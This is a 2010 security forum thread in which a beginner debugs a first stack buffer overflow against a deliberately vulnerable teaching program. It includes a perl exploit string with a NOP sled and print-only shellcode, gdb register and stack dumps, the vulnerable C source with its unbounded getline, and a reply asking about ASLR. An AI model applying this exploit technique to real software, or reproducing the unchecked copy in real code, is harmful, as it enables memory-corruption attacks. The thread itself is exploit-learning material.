Buffer overflow question

Networking/Security Forums -> Exploits // System Weaknesses

Author: HanTan99 PostPosted: Thu Mar 25, 2010 10:05 pm    Post subject: Buffer overflow question
    ----
I"ve been trying to write my first buffer overflow and come across some problems. This is being done on a public piece of code in a buffer overflow paper and is completely non-malicious

I discovered where past my buffer the EIP lies and overwrote it with an address pointing to a series of NOPs on the stack, followed by a piece of shellcode I found on the internet written to print the string "now I pown your computer"

What baffles me is why the program (under gdb) does not seem to be jumping to the shellcode or executing it. Following is a little output from gdb showing my situation.


The string I used to overflow the buffer and overwrite the EIP is:
perl -e 'print "A"x268, "\xf8\xf2\xff\xbf", "\x90"x30, "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd", "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20", "\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74", "\x65\x72"' > input


Code:

(gdb) i r
eax            0x0   0
ecx            0x307265   3175013
edx            0xff2f7164   -13667996
ebx            0x454ff4   4542452
esp            0xbffff2f0   0xbffff2f0
ebp            0x41414141   0x41414141
esi            0x0   0
edi            0x0   0
eip            0xbffff2f8   0xbffff2f8
eflags         0x210212   [ AF IF RF ID ]
cs             0x73   115
ss             0x7b   123
ds             0x7b   123
es             0x7b   123
fs             0x0   0
gs             0x33   51   
(gdb) x/256xb $esp
0xbffff2f0:   0x90   0x90   0x90   0x90   0x90   0x90   0x90   0x90
0xbffff2f8:   0x90   0x90   0x90   0x90   0x90   0x90   0x90   0x90
0xbffff300:   0x90   0x90   0x90   0x90   0x90   0x90   0x90   0x90
0xbffff308:   0x90   0x90   0x90   0x90   0x90   0x90   0xeb   0x19
0xbffff310:   0x31   0xc0   0x31   0xdb   0x31   0xd2   0x31   0xc9
0xbffff318:   0xb0   0x04   0xb3   0x01   0x59   0xb2   0x18   0xcd
0xbffff320:   0x80   0x31   0xc0   0xb0   0x01   0x31   0xdb   0xcd
0xbffff328:   0x80   0xe8   0xe2   0xff   0xff   0xff   0x6e   0x6f
0xbffff330:   0x77   0x20   0x49   0x20   0x70   0x30   0x77   0x6e
0xbffff338:   0x20   0x79   0x6f   0x75   0x72   0x20   0x63   0x6f
0xbffff340:   0x6d   0x70   0x75   0x74   0x65   0x72   0x30   0x00
0xbffff348:   0x02   0x00   0x00   0x00   0x70   0x83   0x04   0x08
0xbffff350:   0x00   0x00   0x00   0x00   0xd0   0xaf   0x2d   0x00
0xbffff358:   0xab   0xf9   0x2f   0x00   0xc4   0x5f   0x2e   0x00
0xbffff360:   0x02   0x00   0x00   0x00   0x70   0x83   0x04   0x08
0xbffff368:   0x00   0x00   0x00   0x00   0x91   0x83   0x04   0x08
0xbffff370:   0x8d   0x84   0x04   0x08   0x02   0x00   0x00   0x00
0xbffff378:   0x94   0xf3   0xff   0xbf   0xf0   0x84   0x04   0x08
0xbffff380:   0xe0   0x84   0x04   0x08   0xe0   0x57   0x2d   0x00
0xbffff388:   0x8c   0xf3   0xff   0xbf   0x60   0x66   0x2e   0x00
0xbffff390:   0x02   0x00   0x00   0x00   0x20   0xf5   0xff   0xbf
0xbffff398:   0x4d   0xf5   0xff   0xbf   0x00   0x00   0x00   0x00
0xbffff3a0:   0x53   0xf5   0xff   0xbf   0x77   0xf5   0xff   0xbf
0xbffff3a8:   0x85   0xf5   0xff   0xbf   0xa6   0xf5   0xff   0xbf
0xbffff3b0:   0xb1   0xf5   0xff   0xbf   0xc1   0xf5   0xff   0xbf
0xbffff3b8:   0x12   0xf6   0xff   0xbf   0x20   0xf6   0xff   0xbf
0xbffff3c0:   0x5d   0xf6   0xff   0xbf   0x6f   0xf6   0xff   0xbf
0xbffff3c8:   0x85   0xf6   0xff   0xbf   0xa3   0xf6   0xff   0xbf
0xbffff3d0:   0xba   0xf6   0xff   0xbf   0xc8   0xf6   0xff   0xbf
0xbffff3d8:   0xca   0xfb   0xff   0xbf   0xe7   0xfb   0xff   0xbf
0xbffff3e0:   0x17   0xfc   0xff   0xbf   0x44   0xfc   0xff   0xbf
0xbffff3e8:   0x92   0xfc   0xff   0xbf   0xa4   0xfc   0xff   0xbf


And the code I am attempting to exploit:
Code:

#include <stdio.h>
#include <string.h>
#define INPUT_BUFFER 256 /* maximum name size */

/*
* read input, copy into s
* gets() is insecure and prints a warning
* so we use this instead
*/
void getline(char *s)
{
int c;

while ((c=getchar()) != EOF)
*s++ = c;
*s = '\0';
}

/*
* convert newlines to nulls in place
*/
void purgenewlines(char *s)
{
int l;

l = strlen(s);

while (l--)
if (s[l] == '\n')
s[l] = '\0';
}


int main()
{
char scapegoat[INPUT_BUFFER];

getline(scapegoat);
/* this check ensures there's no buffer overflow */
if (strlen(scapegoat) < INPUT_BUFFER) {
purgenewlines(scapegoat);
printf("It's all %s's fault.\n", scapegoat);
}
return 0;
}



The shellcode starts at 0xbffff30E and ends at 0xbffff345
The EIP should return to the noops at 0xbffff2f8 and continue until it executes the shell code, correct? If so why am I not seeing output?

Any help would be much appreciated, thanks
Code:

Author: gnix PostPosted: Mon Apr 05, 2010 7:07 am    Post subject:
    ----
Hello HanTan99,

If you post the output of the following two commands, it's easier to help you.

Code:
uname -a


and

Code:
cat /proc/sys/kernel/randomize_va_space


gnix



Networking/Security Forums -> Exploits // System Weaknesses


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group